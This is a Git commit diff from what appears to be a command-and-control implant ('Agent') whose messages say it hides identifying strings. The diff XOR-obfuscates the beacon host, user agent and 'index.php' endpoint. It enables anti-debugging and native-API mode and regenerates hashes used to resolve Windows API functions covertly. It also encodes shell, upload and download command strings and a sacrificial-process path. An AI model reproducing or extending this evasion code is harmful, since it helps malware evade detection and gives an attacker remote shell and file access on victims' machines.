1. Hid PeRun's Fart Strings

2. Hid GhostFart Strings 3. Hid "index.php" String
0xTriboulet · Sep 11, 2023 · d5f5b37 · d5f5b37
1 parent c03956a
commit d5f5b37
Show file tree

Hide file tree

Showing 4 changed files with 85 additions and 81 deletions.
diff --git a/Agent/Include/Config.h b/Agent/Include/Config.h
@@ -1,13 +1,13 @@
 
-#define CONFIG_USER_AGENT {0x8c, 0x0d, 0x17, 0x8e, 0x1c, 0x8c, 0x9a, 0x2d, 0x30, 0x2d, 0xb2, 0xaa, 0xbe, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x3a, 0x9d, 0x80, 0xaa, 0xb1, 0xad, 0xb2, 0x27, 0x3a, 0x91, 0x0d, 0x11, 0x31, 0xa0, 0xbe, 0x2a, 0x8a, 0x02, 0x92, 0x8c, 0x98, 0x11, 0x18, 0x0b, 0x8f, 0x0e, 0x10, 0xad, 0x30, 0x23, 0x31, 0x2d, 0xb3, 0x21, 0xba, 0xae, 0x8f, 0x1e, 0x80, 0x9c, 0x0c, 0xac, 0xba, 0x8c, 0x9e, 0x0f, 0x18, 0x2a, 0x89, 0x08, 0x1b, 0x0f, 0x1d, 0x2e, 0x3a, 0x9b, 0x1e, 0x83, 0x9d, 0x0c, 0x18, 0x2d, 0x36, 0x21, 0xbd, 0xa2, 0xbd, 0xa0, 0xb1, 0xa1, 0xb0, 0xad, 0xb2, 0x22, 0x32, 0xaa, 0x83, 0x0a, 0x19, 0x8a, 0x13, 0x8e, 0x3d, 0x20, 0x33, 0x21, 0x3d, 0xa3, 0x31, 0xba}
-#define CONFIG_HOST {0xb2, 0x26, 0x33, 0xad, 0xb2, 0x21, 0xb6, 0xad, 0xb2, 0xad, 0xb2, 0x26, 0xaa}
+#define CONFIG_USER_AGENT {0x8b, 0x95, 0x10, 0x16, 0x1b, 0x14, 0x9d, 0xb5, 0x37, 0xb5, 0xb5, 0x32, 0xb9, 0x09, 0x19, 0x95, 0x9f, 0x15, 0x16, 0x9b, 0x3d, 0x05, 0x87, 0x32, 0xb6, 0x35, 0xb5, 0xbf, 0x3d, 0x09, 0x0a, 0x89, 0x36, 0x38, 0xb9, 0xb2, 0x8d, 0x9a, 0x95, 0x14, 0x9f, 0x89, 0x1f, 0x93, 0x88, 0x96, 0x17, 0x35, 0x37, 0xbb, 0x36, 0xb5, 0xb4, 0xb9, 0xbd, 0x36, 0x88, 0x86, 0x87, 0x04, 0x0b, 0x34, 0xbd, 0x14, 0x99, 0x97, 0x1f, 0xb2, 0x8e, 0x90, 0x1c, 0x97, 0x1a, 0xb6, 0x3d, 0x03, 0x19, 0x1b, 0x9a, 0x94, 0x1f, 0xb5, 0x31, 0xb9, 0xba, 0x3a, 0xba, 0x38, 0xb6, 0x39, 0xb7, 0x35, 0xb5, 0xba, 0x35, 0x32, 0x84, 0x92, 0x1e, 0x12, 0x14, 0x16, 0x3a, 0xb8, 0x34, 0xb9, 0x3a, 0x3b, 0x36, 0x22}
+#define CONFIG_HOST {0x35, 0xbe, 0x34, 0x35, 0xb5, 0xb9, 0xb1, 0x35, 0xb5, 0x35, 0xb5, 0xbe, 0xad}
 #define CONFIG_PORT 9001
 #define CONFIG_SECURE FALSE
-#define CONFIG_SLEEP 3
+#define CONFIG_SLEEP 10
 #define CONFIG_POLYMORPHIC TRUE
 #define CONFIG_OBFUSCATION TRUE
 #define CONFIG_ARCH 64
-#define CONFIG_NATIVE FALSE
-#define CONFIG_ANTI_DEBUG FALSE
+#define CONFIG_NATIVE TRUE
+#define CONFIG_ANTI_DEBUG TRUE
 #define CONFIG_UNHOOK 2
 #define CONFIG_MAKE 0
diff --git a/Agent/Include/Strings.h b/Agent/Include/Strings.h
@@ -1,67 +1,68 @@
-#define SEED 1347753198
-#define CheckRemoteDebuggerPresent_CRC32B 0xe392fa43
-#define CreateFileW_CRC32B 0xd2d6cfd5
-#define DeviceIoControl_CRC32B 0xb5696dbc
-#define GetAdaptersInfo_CRC32B 0xf7cba3b5
-#define GetComputerNameExA_CRC32B 0xb9b23e2c
-#define GetCurrentProcessId_CRC32B 0xff928b96
-#define GetModuleFileNameA_CRC32B 0xdaa30838
-#define GetNativeSystemInfo_CRC32B 0xc2c59211
-#define GetSystemInfo_CRC32B 0xdb96c465
-#define GetUserNameA_CRC32B 0xc343c2a9
-#define GlobalMemoryStatusEx_CRC32B 0x96f7d353
-#define IsDebuggerPresent_CRC32B 0xf004bce8
-#define K32GetModuleInformation_CRC32B 0xc01507e9
-#define LocalAlloc_CRC32B 0xec942d0a
-#define LdrLoadDll_CRC32B 0xe7a82910
-#define LdrUnloadDll_CRC32B 0xa8da8ce0
-#define NtAllocateVirtualMemory_CRC32B 0xeecfb6ad
-#define NtClose_CRC32B 0xd562043d
-#define NtCreateFile_CRC32B 0xf8620d31
-#define NtCreateProcessEx_CRC32B 0xd784a413
-#define NtCreateSection_CRC32B 0xc5257eb2
-#define NtCreateUserProcess_CRC32B 0xebe8fbb6
-#define NtFreeVirtualMemory_CRC32B 0x9b0f6b4a
-#define NtOpenFile_CRC32B 0xe78b3757
-#define NtProtectVirtualMemory_CRC32B 0xb5155817
-#define NtQueryInformationFile_CRC32B 0xf119c005
-#define NtReadFile_CRC32B 0x97b290f0
-#define NtReadVirtualMemory_CRC32B 0xbd5b3cb4
-#define NtTerminateProcess_CRC32B 0xf6f418c1
-#define NtWriteFile_CRC32B 0xf3ec160b
-#define ReadFile_CRC32B 0xf64381a7
-#define RtlAllocateHeap_CRC32B 0xa664b9d2
-#define RtlCreateProcessParametersEx_CRC32B 0xdb21652b
-#define RtlDestroyProcessParameters_CRC32B 0xad60ae9b
-#define RtlFreeHeap_CRC32B 0xb1a666a8
-#define RtlGetProcessHeaps_CRC32B 0xeba5f523
-#define RtlGetVersion_CRC32B 0xc4287fb1
-#define RtlInitUnicodeString_CRC32B 0xb0ee2ad6
-#define RtlRandomEx_CRC32B 0x94978329
-#define VirtualAlloc_CRC32B 0xf5f01a1f
-#define VirtualProtect_CRC32B 0x9424158e
-#define WinHttpCloseHandle_CRC32B 0x8878721d
-#define WinHttpConnect_CRC32B 0x836ee81f
-#define WinHttpOpen_CRC32B 0xc3004973
-#define WinHttpOpenRequest_CRC32B 0xb20e8b99
-#define WinHttpReadData_CRC32B 0xaadbd5f6
-#define WinHttpReceiveResponse_CRC32B 0x85b6d4f0
-#define WinHttpSendRequest_CRC32B 0xd96d9568
-#define WinHttpSetOption_CRC32B 0xf62c35c0
-#define S_XK {0x55, 0x75,0x0}
-#define S_INSTANCE_NOT_CONNECTED {0x9e, 0x0d, 0x93, 0x00, 0x9a, 0x0d, 0x9b, 0x08, 0x3a, 0x8d, 0x9d, 0x00, 0xba, 0x8b, 0x1d, 0x0d, 0x9d, 0x88, 0x1b, 0x00, 0x98, 0x08, 0xba, 0x3a}
-#define S_COMMAND_NOT_FOUND {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x9d, 0x8d, 0x10, 0xaa, 0x99, 0x8d, 0x10, 0x0d, 0x98, 0xba}
-#define S_IS_COMMAND_NO_JOB {0x9e, 0x03, 0x3a, 0x8b, 0x1d, 0x0c, 0x1c, 0x0a, 0x1d, 0x88, 0xba, 0x8d, 0x9d, 0x2a, 0x9f, 0x8d, 0x1b, 0xba}
-#define S_TRANSPORT_FAILED {0x90, 0x83, 0x9a, 0x0d, 0x93, 0x02, 0x9d, 0x03, 0x90, 0xaa, 0x99, 0x8a, 0x1e, 0x0c, 0x98, 0x08, 0xaa}
-#define S_COMMAND_SHELL {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x93, 0x0e, 0x98, 0x0c, 0x9c, 0xba}
-#define S_COMMAND_UPLOAD {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x90, 0x02, 0x9c, 0x8d, 0x1a, 0x08, 0xaa}
-#define S_COMMAND_DOWNLOAD {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x98, 0x8d, 0x11, 0x0d, 0x9c, 0x8d, 0x1a, 0x08, 0xaa}
-#define S_COMMAND_EXIT {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x98, 0x06, 0x9e, 0x00, 0xaa}
-#define S_NTDLL {0x9d, 0x80, 0x98, 0x8c, 0x9c, 0xad, 0x98, 0x8c, 0x9c, 0xba}
-#define S_WINHTTP {0x91, 0x0e, 0x1d, 0x8e, 0x90, 0x80, 0x92, 0xad, 0x98, 0x8c, 0x9c, 0xba}
-#define S_KERNEL32 {0x9f, 0x08, 0x13, 0x8d, 0x98, 0x0c, 0xb3, 0x23, 0xbd, 0x88, 0x9c, 0x8c, 0xaa}
-#define S_ADVAPI32 {0x9a, 0x08, 0x91, 0x8a, 0x12, 0x8e, 0x33, 0x23, 0xbd, 0x88, 0x9c, 0x8c, 0xaa}
-#define S_IPHLPAPI {0x9e, 0x02, 0x9e, 0x8c, 0x92, 0x8a, 0x12, 0x8e, 0x3d, 0x88, 0x9c, 0x8c, 0xaa}
-#define S_SACR_PROC {0x8b, 0x27, 0x84, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x04, 0x93, 0x16, 0x03, 0x10, 0x88, 0x1c, 0x23, 0x33, 0x94, 0x92, 0x83, 0x9e, 0x0d, 0x90, 0xad, 0x98, 0x06, 0x98, 0x3a}
-#define S_WEB_RS {0x84, 0xa5, 0x35, 0x14, 0x8b, 0x27, 0x84, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x04, 0x93, 0x16, 0x03, 0x10, 0x88, 0x1c, 0x23, 0x33, 0x94, 0x81, 0x18, 0x0b, 0xad, 0x93, 0x83, 0x2a}
-#define S_MARKER_MASK {0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0xaa}
+#define SEED 3635961861
+#define CheckRemoteDebuggerPresent_CRC32B 0x885199eb
+#define CreateFileW_CRC32B 0x7ca9fdf7
+#define DeviceIoControl_CRC32B 0x5dff5bc
+#define GetAdaptersInfo_CRC32B 0x860bcc91
+#define GetComputerNameExA_CRC32B 0x57c20986
+#define GetCurrentProcessId_CRC32B 0x8b0f1c92
+#define GetModuleFileNameA_CRC32B 0x18e71fb5
+#define GetNativeSystemInfo_CRC32B 0xfb6f1491
+#define GetSystemInfo_CRC32B 0x8bc989c
+#define GetUserNameA_CRC32B 0x65a31ec2
+#define GlobalMemoryStatusEx_CRC32B 0x87b5971b
+#define IsDebuggerPresent_CRC32B 0xa262625
+#define K32GetModuleInformation_CRC32B 0x9e139467
+#define LocalAlloc_CRC32B 0x547ae9c3
+#define LdrLoadDll_CRC32B 0x9fd7ba81
+#define LdrUnloadDll_CRC32B 0x36b5d783
+#define NtAllocateVirtualMemory_CRC32B 0x2be178e4
+#define NtClose_CRC32B 0xd4b8d5b5
+#define NtCreateFile_CRC32B 0x1f7f6261
+#define NtCreateProcessEx_CRC32B 0x4798634a
+#define NtCreateSection_CRC32B 0xfb5eed9
+#define NtCreateUserProcess_CRC32B 0x7a44708f
+#define NtFreeVirtualMemory_CRC32B 0xad101543
+#define NtOpenFile_CRC32B 0x27e02400
+#define NtProtectVirtualMemory_CRC32B 0x91cfb8a0
+#define NtQueryInformationFile_CRC32B 0xb8de437c
+#define NtReadFile_CRC32B 0x85f4ed54
+#define NtReadVirtualMemory_CRC32B 0x715842d5
+#define NtTerminateProcess_CRC32B 0x10353a5a
+#define NtWriteFile_CRC32B 0xf559f6c8
+#define ReadFile_CRC32B 0xc133d76d
+#define RtlAllocateHeap_CRC32B 0x58769d66
+#define RtlCreateProcessParametersEx_CRC32B 0x387ac81c
+#define RtlDestroyProcessParameters_CRC32B 0x8cfc5ab1
+#define RtlFreeHeap_CRC32B 0x464c773f
+#define RtlGetProcessHeaps_CRC32B 0x45233790
+#define RtlGetVersion_CRC32B 0x101dbe00
+#define RtlInitUnicodeString_CRC32B 0x418b747f
+#define RtlRandomEx_CRC32B 0x19361973
+#define VirtualAlloc_CRC32B 0xd2cf53e
+#define VirtualProtect_CRC32B 0xd0d791fc
+#define WinHttpCloseHandle_CRC32B 0x78a3bdcd
+#define WinHttpConnect_CRC32B 0x820b4286
+#define WinHttpOpen_CRC32B 0x3cf804d4
+#define WinHttpOpenRequest_CRC32B 0xdb2cb56d
+#define WinHttpReadData_CRC32B 0xe908d866
+#define WinHttpReceiveResponse_CRC32B 0x335cb409
+#define WinHttpSendRequest_CRC32B 0x63f64e1d
+#define WinHttpSetOption_CRC32B 0xc81266b6
+#define S_XK {0x5a, 0x45,0x0}
+#define S_INSTANCE_NOT_CONNECTED {0x99, 0x95, 0x94, 0x98, 0x9d, 0x95, 0x9c, 0x90, 0x3d, 0x15, 0x9a, 0x98, 0xbd, 0x13, 0x1a, 0x95, 0x9a, 0x10, 0x1c, 0x98, 0x9f, 0x90, 0xbd, 0xa2}
+#define S_COMMAND_NOT_FOUND {0x9c, 0x95, 0x1b, 0x94, 0x1d, 0x95, 0x9f, 0x32, 0x9a, 0x15, 0x17, 0x32, 0x9e, 0x15, 0x17, 0x95, 0x9f, 0x22}
+#define S_IS_COMMAND_NO_JOB {0x99, 0x9b, 0x3d, 0x13, 0x1a, 0x94, 0x1b, 0x92, 0x1a, 0x10, 0xbd, 0x15, 0x9a, 0xb2, 0x98, 0x15, 0x1c, 0x22}
+#define S_TRANSPORT_FAILED {0x17, 0x1b, 0x9d, 0x95, 0x94, 0x9a, 0x9a, 0x9b, 0x97, 0x32, 0x9e, 0x12, 0x19, 0x94, 0x9f, 0x90, 0xad}
+#define S_COMMAND_SHELL {0x9c, 0x95, 0x1b, 0x94, 0x1d, 0x95, 0x9f, 0x32, 0x94, 0x96, 0x9f, 0x94, 0x9b, 0x22}
+#define S_COMMAND_UPLOAD {0x1c, 0x95, 0x1b, 0x94, 0x1d, 0x95, 0x9f, 0x32, 0x97, 0x9a, 0x9b, 0x15, 0x1d, 0x90, 0xad}
+#define S_COMMAND_DOWNLOAD {0x1c, 0x95, 0x1b, 0x94, 0x1d, 0x95, 0x9f, 0x32, 0x9f, 0x15, 0x16, 0x95, 0x9b, 0x15, 0x1d, 0x90, 0xad}
+#define S_COMMAND_EXIT {0x1c, 0x95, 0x1b, 0x94, 0x1d, 0x95, 0x9f, 0x32, 0x9f, 0x9e, 0x99, 0x98, 0xad}
+#define S_NTDLL {0x9a, 0x18, 0x9f, 0x14, 0x9b, 0x35, 0x9f, 0x14, 0x9b, 0x22}
+#define S_WINHTTP {0x96, 0x96, 0x1a, 0x16, 0x97, 0x18, 0x95, 0x35, 0x9f, 0x14, 0x9b, 0x22}
+#define S_KERNEL32 {0x18, 0x90, 0x14, 0x15, 0x9f, 0x94, 0xb4, 0xbb, 0xba, 0x10, 0x9b, 0x14, 0xad}
+#define S_ADVAPI32 {0x1d, 0x90, 0x96, 0x12, 0x15, 0x16, 0x34, 0xbb, 0xba, 0x10, 0x9b, 0x14, 0xad}
+#define S_IPHLPAPI {0x19, 0x9a, 0x99, 0x14, 0x95, 0x12, 0x15, 0x16, 0x3a, 0x10, 0x9b, 0x14, 0xad}
+#define S_SACR_PROC {0x8c, 0xbf, 0x83, 0x09, 0x19, 0x95, 0x9f, 0x15, 0x16, 0x9b, 0x03, 0x0b, 0x11, 0x9b, 0x17, 0x10, 0x1b, 0xbb, 0x34, 0x0c, 0x95, 0x1b, 0x99, 0x95, 0x97, 0x35, 0x9f, 0x9e, 0x9f, 0xa2}
+#define S_WEB_RS {0x03, 0x3d, 0x32, 0x8c, 0x8c, 0xbf, 0x83, 0x09, 0x19, 0x95, 0x9f, 0x15, 0x16, 0x9b, 0x03, 0x0b, 0x11, 0x9b, 0x17, 0x10, 0x1b, 0xbb, 0x34, 0x0c, 0x86, 0x80, 0x0c, 0x35, 0x94, 0x1b, 0x2d}
+#define S_MARKER_MASK {0x11, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0x91, 0x1e, 0xad}
+#define S_INDEX {0x99, 0x95, 0x9f, 0x10, 0x11, 0x35, 0x95, 0x16, 0x95, 0x22}
diff --git a/Agent/Source/Transport.c b/Agent/Source/Transport.c
@@ -304,9 +304,6 @@ BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize
 
     ROL_AND_DECRYPT((CHAR *)s_string, sizeof(s_string), 1, winhttp, Instance.XOR_KEY);
 
-
-    //winhttp[11] = 0x00;
-
     WinHttpOpen_t p_WinHttpOpen  = (WinHttpOpen_t) GetProcAddressByHash(LocalGetModuleHandle(winhttp), WinHttpOpen_CRC32B);
     hSession = p_WinHttpOpen( Instance.Config.Transport.UserAgent, HttpAccessType, HttpProxy, WINHTTP_NO_PROXY_BYPASS, 0 );
 
@@ -316,6 +313,8 @@ BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize
     check_debug(hSession != NULL, "WinHttpOpen Failed!");
 
 #if CONFIG_OBFUSCATION == TRUE
+
+
     WinHttpConnect_t p_WinHttpConnect  = (WinHttpConnect_t) GetProcAddressByHash(LocalGetModuleHandle(winhttp),
                                                                                 WinHttpConnect_CRC32B);
     hConnect = p_WinHttpConnect( hSession, Instance.Config.Transport.Host, Instance.Config.Transport.Port, 0 );
@@ -326,7 +325,12 @@ BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize
 
     check_debug(hConnect != NULL, "WinHttpConnect Failed!");
 
-    HttpEndpoint = L"index.php";
+    UCHAR e_HttpEndpoint[] = S_INDEX;
+    UCHAR d_HttpEndPoint[sizeof(e_HttpEndpoint)];
+
+    ROL_AND_DECRYPT(e_HttpEndpoint, sizeof(e_HttpEndpoint), 1, d_HttpEndPoint, Instance.XOR_KEY);
+
+    // HttpEndpoint = L"index.php";
     HttpFlags    = WINHTTP_FLAG_BYPASS_PROXY_CACHE;
 
     if ( Instance.Config.Transport.Secure ) {
@@ -336,11 +340,11 @@ BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize
 #if CONFIG_OBFUSCATION == TRUE
     WinHttpOpenRequest_t p_WinHttpOpenRequest  = (WinHttpOpenRequest_t) GetProcAddressByHash(LocalGetModuleHandle(winhttp),
                                                                                             WinHttpOpenRequest_CRC32B);
-    hRequest = p_WinHttpOpenRequest( hConnect, L"POST", HttpEndpoint, NULL, NULL, NULL, HttpFlags );
+    hRequest = p_WinHttpOpenRequest( hConnect, L"POST", d_HttpEndPoint, NULL, NULL, NULL, HttpFlags );
 
 
 #else
-    hRequest = WinHttpOpenRequest( hConnect, L"POST", HttpEndpoint, NULL, NULL, NULL, HttpFlags );
+    hRequest = WinHttpOpenRequest( hConnect, L"POST", d_HttpEndPoint, NULL, NULL, NULL, HttpFlags );
 #endif
 
     check_debug(hRequest != NULL, "WinHttpOpenRequest Failed!");

diff --git a/Constants.py b/Constants.py
@@ -65,9 +65,8 @@
     "#define S_KERNEL32               \"kernel32.dll\"",
     "#define S_ADVAPI32               \"advapi32.dll\"",
     "#define S_IPHLPAPI               \"iphlpapi.dll\"",
-    "#define S_INDEX                  \"index.php\""
     "#define S_SACR_PROC              \"C:\\Windows\\System32\\print.exe\"",
     "#define S_WEB_RS                 \"\\??\\C:\\Windows\\System32\\WEB.rs\"",
-    "#define S_MARKER_MASK            \"xxxxxxxxxxxxxxxxxxxxxxxx\""
-
+    "#define S_MARKER_MASK            \"xxxxxxxxxxxxxxxxxxxxxxxx\"",
+    "#define S_INDEX                  \"index.php\""
 ]